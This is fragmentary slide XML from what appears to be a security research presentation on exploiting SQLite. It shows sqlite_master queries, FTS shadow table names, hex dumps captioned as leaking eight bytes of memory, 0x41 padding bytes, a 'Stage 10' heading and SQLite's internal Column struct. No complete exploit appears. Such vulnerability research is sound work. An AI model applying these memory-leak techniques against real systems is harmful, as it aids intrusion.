                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>sqlite_master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'table'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>mail_content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>mail_segments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>mail_segdir</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1896164321"/>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FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 64 A0 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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4024" y="3756025"/>
            <a:ext cx="1939796" cy="200155"/>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555882829"/>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1690335"/>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5281260"/>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307273"/>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41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</a:t>
            </a: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41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</a:t>
            </a:r>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5288848"/>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507976" y="3676264"/>
            <a:ext cx="3566249" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>All 8 bytes are leaked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5074225" y="3856103"/>
            <a:ext cx="459799" cy="4827"/>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1728435"/>
            <a:ext cx="5572125" cy="3785652"/>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10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2</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3</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4</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6</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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0 21 54 64 A0 21 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 00 00 00 00 00</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16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10529455" y="3507578"/>
            <a:ext cx="282865" cy="196203"/>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34023" y="3756025"/>
            <a:ext cx="2620931" cy="200155"/>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067033209"/>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72401" y="2801711"/>
            <a:ext cx="3460491" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stage 10</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331" y="1112382"/>
            <a:ext cx="6916273" cy="4616612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2996846451"/>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3712" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The default column</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"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1268969"/>
            <a:ext cx="7100596" cy="38472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2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TABLE_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>col1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DEFAULT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>default_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>;</a:t>
            </a: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altLang="ko-KR" sz="1600" kern="100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8"/>
              </a:solidFill>
              <a:latin typeface="Monaco"/>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altLang="ko-KR" sz="1600" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8"/>
              </a:solidFill>
              <a:latin typeface="Monaco"/>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altLang="ko-KR" sz="1600" kern="100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8"/>
              </a:solidFill>
              <a:latin typeface="Monaco"/>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altLang="ko-KR" sz="1600" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8"/>
              </a:solidFill>
              <a:latin typeface="Monaco"/>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altLang="ko-KR" sz="1600" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8"/>
              </a:solidFill>
              <a:latin typeface="Monaco"/>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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> Column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>zName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* Name of this column, \000, then the type */</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  Expr *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pDflt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* Default value of this column */</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>zColl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* Collating sequence.  If NULL, use the default */</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  u8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>notNull</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* An OE_ code for handling a NOT NULL constraint */</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> affinity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* One of the SQLITE_AFF_... values */</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
